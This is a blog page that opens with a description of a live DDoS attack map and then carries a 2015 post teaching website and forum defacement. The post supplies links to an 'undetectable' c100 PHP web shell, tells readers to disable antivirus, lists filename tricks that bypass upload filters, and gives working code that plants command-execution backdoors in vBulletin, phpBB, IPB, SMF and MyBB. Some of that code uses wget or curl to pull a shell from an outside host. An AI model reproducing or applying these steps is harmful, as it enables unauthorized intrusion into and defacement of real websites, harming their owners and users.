Live Ddos View

Live DDoS Attack Map | Apakau

Live DDoS Attack Map

This map is the fruit of collaboration between Google Ideas and Arbor Networks in an effort to raise awareness about distributed denial of service attacks in the world everyday.

Exploring the Data

The Digital Attack Map displays global DDoS activity on any given day. Attacks are displayed as dotted lines, scaled to size, and placed according to the source and destination countries of the attack traffic when known. Some features include:

  • Use the histogram at the bottom of the map to explore historical data.
  • Select a country to view DDoS activity to or from that country.
  • Use the color option to view attacks by class, duration, or source/destination port.
  • Use the news section to find online reports of attack activity from a specified time.
  • View the gallery to explore some examples of days with notable DDoS attacks.

Sign Up

Monday, February 9, 2015

How to Deface Website/Forums Detailed ?


Here I will show you how to deface a website

First of all you will need shell. I will give you modified c100 shell which I use and it is undetectable.

Download Link: DL c100v2 FUD - Mediafire
Download Link: DL c100 Not FUD - Mediafire

If you are using c100v2 skip the part about setting username/password because it don't have it. If you are using c100 wich is false positive, disable your av and continue with tutorial. First when you download c100.php you will need to edit it with notepad. And set your Username and Password, so that only one who know

user/pw can access shell and website.

[Image: shelasd.jpg]

Thee green part, Username and passowrd edit as you like. But the md5 pass must be crypted. For that you go to 

Crypo.com - Here you will make your pas MD5 [Image: sadsdasd.jpg]

So on crypo.com you write the password you writed in c100.php in my case it is hackforums and for that I

get this MD5 password, copy it and paste in our shell c100.php 
Code:
ad3dd2ebd28e5d7f81ec326fbdf1fa7b

So in my case c100 should look like this
Code:
$login = "Dimitrije"; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = "hackforums"; //password
$md5_pass = "ad3dd2ebd28e5d7f81ec326fbdf1fa7b"; //md5-cryped pass. if null, md5($pass)

When you do that, save it and now find on website place where you can upload some file. Sometimes the

website will block .php extension so you will have to bypass it. First open your shell with notepad and then Save As and change the

extension to one of these 
Code:
shell.php;.jpg
c100.php.jpg
c100.php..jpg
c100.php.jpg
c100.php.jpg:;
c100.php.jpg%;
c100.php.jpg;
c100.php.jpg;
c100.php.jpg:;


If website doesn't have any place where you can upload files, but have place where you can add news o

new event or something you can use meta http-equiv to make redirection from website to your deface page. You do that by adding this

code in news 
Code:
<meta http-equiv="refresh" content="0;url=http://link_to_your_defacee_page">

You could also use javascript
Code:
<script type="text/javascript">
<!--
window.location = "http://www.link_to_your_deface_page.html"
//-->
</script>

Once you find admin panel upload your shell, if you can't upload .php directly upload it with modified

extensions as I stated above. 

[Image: neasd.jpg]

After you uploaded it find the link where you uploaded it, example if you uploaded it in images then it will be

in site/images/c100.php After you enter the link the new Pop up windows will apear and it will ask you for login. Here you write you

username and password your wrote in c100.php. After that you should get in website.

Sometimes simply extension hiding will not work so you will have to use one addon for firefox [url=https://addons.mozilla.org/en-

US/firefox/addon/live-http-headers/]Live HTTP Headers[/url] Install it and then hide shell extension, go to the upload section. Open Live

HTTP Headers and upload shell. Now if you try to go to the link where you have your shell uploaded it will give you error (only on some

websites) so we will have to change that hided .php.jpg extension into the .php. So as we uploaded the shell and opened the Live

HTTP Headers you should find where you have uploaded your shell. You will have to find the line where ti writes that you uploaded the

shell. Select it and then click on button reply. 

[Image: 124124g.jpg]

After that you will have to find once again the same line of code which shows that you have uploaded

shell. So when you find it select the extension you used to hide original .php. In my case it is .jpg (List of all these extension is given in

this tutorial at the beginning). When you select it delete it so that we have only c100.php. And after that once again click on reply.

[Image: 12412412414.png]

It should take you to the shell screen and if it doesn't you will have to find manually where shell has been

uploaded and go to that link. Niote: This doesn't work for every website but work for a lot. Now you are in website.

[Image: unlednzl.jpg]

Find main index.php and edit it with your deface page source code, and click save. Thats it 
Uploading shell on forums


// - vBulletin - //

To upload shell on vbulletin, we must have admin account with the access to tje tamplate and plug-ins.

1) Go to Plugins & Products, and click Add new Plugin, fill in a form like this
Code:
Product : vBulletin

Hook Location : global_start

Title : default_plugin (moze biti i bilo sta drugo)
Execution Order : 5

Plugin PHP Code:
ob_start();
system($_GET['cmd']);
$execcode = ob_get_contents();
ob_end_clean();

After you fill the information, save.

2) Now go to Styles & Templates --> Style Manager, and when selecting default style choose Edit Template. Choose from home templates

and expand it, and then click on ForumHome and edit. At first there is this code
Code:
$header
$navbar

That should be replaced with
Code:
$header
$execcode
$navbar

And then save

3) Now go to the forum starting page (forum home page), there sould be written somewhere "Cannot execute blank command"
In index.php we add -->
Code:
?cmd=wget http://www.link_to_shell.com/shell.txt;mv shell.txt shell.php

It should look like this then -->
Code:
http://site.com/forums/?cmd=wget http://www.link_to_shell.com/shell.txt;mv shell.txt shell.php

This download the content of shell.txt and rename it to shell.php We access to shell in directory of forum,

so if forum is installed in site.com/forums, shell is in site.com/forums/shell.php

If you are not able to reach across the shell wget, you can try to curl. In index.php add this:
Code:
?cmd=curl http://www.link_to_shell.com/shell.txt > shell.php

-->It then looks liek this ->
Code:
http://www.site.com/forums/index.php?cmd=curl http://www.link_to_shell.com/shell.txt> shell.php

// - phpBB - //

You log in as admin, choose the right Security Settings, scroll to Allow php in templates. That value must

be placed on Yes, if it is not set to yes. do it. When you do this go to Styles-->Templates-->Edit. For template choose faq_body.html
below:
Code:
<!-- INCLUDE overall_header.html -->

we add:
Code:
<!-- PHP -->
fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i]));
<!-- ENDPHP -->

We save that and then go to
Code:
site.com/forum/faq.php?o=shell.php&i=http://link_to_shell.com/shell.txt

Shell is ready in site.com/forum/shell.php

// - IPB - //

This works for usual admins on ipb forum, because there are two types of admin (root and normal). So

we log in, select the tab at top named Lock and Feel then go to Manage Languages, we choose language and then section, for example

public_help
Now we edit help_txt
Choose a topic from the list, or search for a topic
in right field, add this code:
Code:
${${print $query='cd cache; wget http://link_do_shell/shell.txt;mv shell.txt shell.php'}}
${${system($query,$out)}}
${${print $out}}

When you add that, press GO at bottom. Now we go to
Code:
site.com/index.php?app=core&module=help

And the our code we added will execute and you will get your shell in site.com/cache/shell.php
Why cache, because it is by default chmod to 777-an

// - SMF - //

First we have to download some theme for smf. I used this one for example:
Code:
http://custom.simplemachines.org/themes/index.php?lemma=2216

Once you downloaded that theme, you pick up some shell and add it to .rar of that theme. Now log in to

admin panel and below Configuration part choose: Themes and Layout. Choose Install a New Theme and browse. Then pick up .ra

archive with theme you downloaded and put your shell in it. Then press install. When the theme is installed you could access to you

shell-->
Code:
site.com/forum/Themes/ime_arhive/shell.php

// - MyBB - //

So we log in as admin to site.com/admin and then go to Templayes&Style tab. Then you see what theme

is being used. You will see that by numbers of users that are next to theme name.Then to to templates at left and click on templates of

theme that is used. Search for Index Templates. Open it and click on index. Delete all code there and paste your deface page source.Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

( Admin )

Posted by at No comments:
Subscribe to: Posts (Atom)